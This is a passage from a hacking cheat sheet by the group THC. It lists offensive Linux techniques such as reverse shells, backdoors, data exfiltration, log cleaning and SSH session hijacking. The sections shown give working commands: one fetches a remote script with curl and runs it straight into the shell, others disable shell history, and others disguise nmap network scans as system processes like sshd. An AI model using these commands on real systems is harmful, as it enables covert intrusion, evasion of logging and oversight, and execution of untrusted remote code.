THC's favourite Tips, Tricks & Hacks (Cheat Sheet)
https://thc.org/tips
A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.
We show the tricks 'as is' without any explanation why they work. You need to know Linux to understand how and why they work.
Got tricks? Join us https://thc.org/ops
- Bash
- Set up a Hack Shell
- Hide your commands
- Hide your command line options
- Hide a network connection
- Hide a process as user
- Hide a process as root
- Hide scripts
- Hide from cat
- Execute in parallel with separate logfiles
- SSH
- Almost invisible SSH
- Multiple shells via 1 SSH/TCP connection
- SSH tunnel
- SSH socks5 tunnel
- SSH to NATed host
- SSH pivot via ProxyJump
- SSHD as user
- Network
- Discover hosts
- Tcpdump
- Tunnel and forwarding
- Raw TCP reverse ports
- HTTPS reverse forwards
- Bouncing traffic with iptables
- Ghost IP / IP Spoofing
- Various
- Use any tool via Socks Proxy
- Find your public IP address
- Check reachability from around the world
- Check/Scan Open Ports
- Crack Passwords hashes
- Brute Force Passwords / Keys
- Data Upload/Download/Exfil
- File Encoding/Decoding
- File transfer using cut & paste
- File transfer using tmux
- File transfer using screen
- File transfer using gs-netcat and sftp
- File transfer using HTTP
- File download without curl
- File transfer using rsync
- File transfer to public dump sites
- File transfer using WebDAV
- File transfer to Telegram
- Reverse Shell / Dumb Shell
- Reverse Shells
- with gs-netcat (encrypted)
- with Bash
- with cURL (encrypted)
- with cURL (cleartext)
- with OpenSSL (encrypted)
- with remote.moe (encrypted)
- without /dev/tcp
- with Python
- with Perl
- with PHP
- Upgrading the dumb shell
- Upgrade a reverse shell to a pty shell
- Upgrade a reverse shell to a fully interactive shell
- Reverse shell with socat (fully interactive)
- Backdoors
- gs-netcat
- sshx.io
- Smallest SSHD backdoor
- Remote access an entire network
- Smallest PHP backdoor
- Smallest reverse DNS-tunnel backdoor
- Local Root backdoor
- Self-extracting implant
- Host Recon
- Shell Hacks
- Shred files (secure delete)
- Restore the date of a file
- Clean logfile
- Hide files from a User without root privileges
- Make a file immutable
- Change user without sudo/su
- Obfuscate and crypt payload
- Deploying a backdoor without touching the file-system
- Crypto
- Generate quick random Password
- Linux transportable encrypted filesystems
- cryptsetup
- EncFS
- Encrypting a file
- Session sniffing and hijacking
- Sniff a user's SHELL session
- Sniff all SHELL sessions with dtrace
- Sniff all SHELL sessions with eBPF
- Sniff a user's SSH or SSHD session with strace
- Sniff a user's outgoing SSH session with a wrapper script
- Sniff a user's outgoing SSH session with SSH-IT
- Hijack / Take-over a running SSH session
- VPN and Shells
- Disposable Root Servers
- VPN/VPS Providers
- OSINT Intelligence Gathering
- Miscellaneous
- Tools of the trade
- Cool Linux commands
- tmux Cheat Sheet
- Useful commands
- How to become a Hacker
- Other Sites
1. Bash / Shell
1.i. Set up a Hack Shell (bash):
Make BASH less noisy. Disables ~/.bash_history and many other things.
source <(curl -SsfL https://thc.org/hs)
Alternative URL:
source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)
And if there is no curl/wget, use surl and (temporarily) installed curl with bin curl.
source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)
# Afterwards type `bin curl` to (temporarily) install curl (in memory).
HackShell does much more but most importantly this:
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"
TERM=xterm reset -I
stty cols 400 # paste this on its own before pasting the next line:
resize &>/dev/null || { stty -echo;printf "\e[18t"; read -t5 -rdt R;IFS=';' read -r -a a <<< "${R:-8;25;80}";[ "${a[1]}" -ge "${a[2]}" ] && { R="${a[1]}";a[1]="${a[2]}";a[2]="${R}";};stty sane rows "${a[1]}" cols "${a[2]}";}
# stty sane rows 60 cols 160
We use anew a lot, and this is a quick workaround:
xanew() { awk 'hit[$0]==0 {hit[$0]=1; print $0}'; }
which anew &>/dev/null || alias anew=xanew
Bonus tip:
Any command starting with a " " (space) will not get logged to history either.
$ id
1.ii. Hide your command / Daemonzie your command
This will hide the process name only. Use zapper to also hide the command line options.
(exec -a syslogd nmap -Pn -F -n --open -oG - 10.0.2.1/24) # Note the brackets '(' and ')'
Start a background 'nmap' hidden as '/usr/sbin/sshd':
(exec -a '/usr/sbin/sshd' nmap -Pn -F -n --open -oG - 10.0.2.1/24 &>nmap.log &)